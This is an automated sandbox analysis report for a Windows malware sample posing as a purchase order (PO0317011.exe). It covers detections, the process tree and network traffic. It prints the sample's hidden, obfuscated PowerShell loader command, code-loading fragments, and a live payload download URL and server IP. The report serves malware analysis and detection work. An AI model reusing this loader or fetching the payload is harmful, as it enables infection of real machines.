Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO0317011.exe

Overview

General Information

Sample name:PO0317011.exe
Analysis ID:1638437
MD5:ac30b21ea0e4758774eec541ef3445e3
SHA1:ccde32ff4ff72d31a21635d14521cf38f7b9351f
SHA256:05f9ab531ad28b30e3b464ab5c1800890c97c746873b13f5c55a2cdfffb58528
Tags:exeuser-threatcat_ch
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PO0317011.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\PO0317011.exe" MD5: AC30B21EA0E4758774EEC541EF3445E3)
    • powershell.exe (PID: 7764 cmdline: powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7356 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Msiexec Initiated Connection
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 5.255.110.9, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7356, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49723
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7764, TargetFilename: C:\Users\user\AppData\Local\resider\actinidiaceae\PO0317011.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)", CommandLine: powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO0317011.exe", ParentImage: C:\Users\user\Desktop\PO0317011.exe, ParentProcessId: 7736, ParentProcessName: PO0317011.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)", ProcessId: 7764, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-14T11:59:25.416764+010028032702Potentially Bad Traffic192.168.2.4497235.255.110.9443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: PO0317011.exeAvira: detected
Antivirus detection for URL or domain
Source: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binAvira URL Cloud: Label: malware
Source: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binI#yAvira URL Cloud: Label: malware
Source: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bincSAvira URL Cloud: Label: malware
Source: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bin~RUAvira URL Cloud: Label: malware
Source: https://kenkyo.x24.eu/Avira URL Cloud: Label: malware
Source: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binB#Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\resider\actinidiaceae\PO0317011.exeAvira: detection malicious, Label: TR/Injector.pmbgm
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\resider\actinidiaceae\PO0317011.exeReversingLabs: Detection: 52%
Multi AV Scanner detection for submitted file
Source: PO0317011.exeVirustotal: Detection: 63%Perma Link
Source: PO0317011.exeReversingLabs: Detection: 52%
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: PO0317011.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 5.255.110.9:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: PO0317011.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: W.pdb4 source: msiexec.exe, 0000000B.00000003.2269063976.0000000007D91000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
Source: Joe Sandbox ViewIP Address: 5.255.110.9 5.255.110.9
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49723 -> 5.255.110.9:443
Source: global trafficHTTP traffic detected: GET /wp-includes/QgxEZRXDZppAsQj120.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: kenkyo.x24.euCache-Control: no-cache
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /wp-includes/QgxEZRXDZppAsQj120.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: kenkyo.x24.euCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: kenkyo.x24.eu
Source: msiexec.exe, 0000000B.00000003.2269063976.0000000007D56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2268318114.0000000007D56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2268428595.0000000007D8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: PO0317011.exe, PO0317011.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kenkyo.x24.eu/
Source: msiexec.exe, 0000000B.00000002.2490542175.0000000007CDA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2501990981.0000000022D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bin
Source: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binB#
Source: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.binI#y
Source: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bincS
Source: msiexec.exe, 0000000B.00000002.2490542175.0000000007D1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kenkyo.x24.eu/wp-includes/QgxEZRXDZppAsQj120.bin~RU
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 5.255.110.9:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_004052EE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052EE

System Summary

barindex
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\resider\actinidiaceae\PO0317011.exeJump to dropped file
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_00404B2B0_2_00404B2B
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_004070400_2_00407040
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_004068690_2_00406869
Source: PO0317011.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal100.evad.winEXE@6/21@1/1
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_004045AF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045AF
Source: C:\Users\user\Desktop\PO0317011.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
Source: C:\Users\user\Desktop\PO0317011.exeFile created: C:\Users\user\AppData\Local\residerJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Users\user\Desktop\PO0317011.exeFile created: C:\Users\user\AppData\Local\Temp\nsu3054.tmpJump to behavior
Source: PO0317011.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\PO0317011.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PO0317011.exeVirustotal: Detection: 63%
Source: PO0317011.exeReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\PO0317011.exeFile read: C:\Users\user\Desktop\PO0317011.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\PO0317011.exe "C:\Users\user\Desktop\PO0317011.exe"
Source: C:\Users\user\Desktop\PO0317011.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\PO0317011.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msvbvm60.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vb6zz.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\PO0317011.exeFile written: C:\Users\user\AppData\Local\resider\actinidiaceae\forurolige.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: PO0317011.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: W.pdb4 source: msiexec.exe, 0000000B.00000003.2269063976.0000000007D91000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Bedemller $Officerskorpsets $Allergolog), (Gatfinnens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Skriftkoderne = [AppDomain]::CurrentDomain.GetAssembl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Jalousilaagernes)), $Unridiculousness).DefineDynamicModule($Aaretagenes, $false).DefineType($Penneeck, $Airtime164, [System.MulticastD
Suspicious powershell command line found
Source: C:\Users\user\Desktop\PO0317011.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)"
Source: C:\Users\user\Desktop\PO0317011.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Yern=GC -Raw 'C:\Users\user\AppData\Local\resider\actinidiaceae\Sendetidernes.fru';$Haul=$Yern.SubString(53177,3);.$Haul($Yern)"Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C34A87 push esp; retf 11_2_02C34AA7
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C34C84 push ecx; iretd 11_2_02C34C85
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C31DA9 pushad ; iretd 11_2_02C31DAA
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C31F53 push ss; ret 11_2_02C31F54
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C32057 push edi; retf 11_2_02C32058
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C3045B pushad ; iretd 11_2_02C3045C
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C3381A push esi; iretd 11_2_02C3381B
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_02C34B3A push edi; iretd 11_2_02C34B3B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\resider\actinidiaceae\PO0317011.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
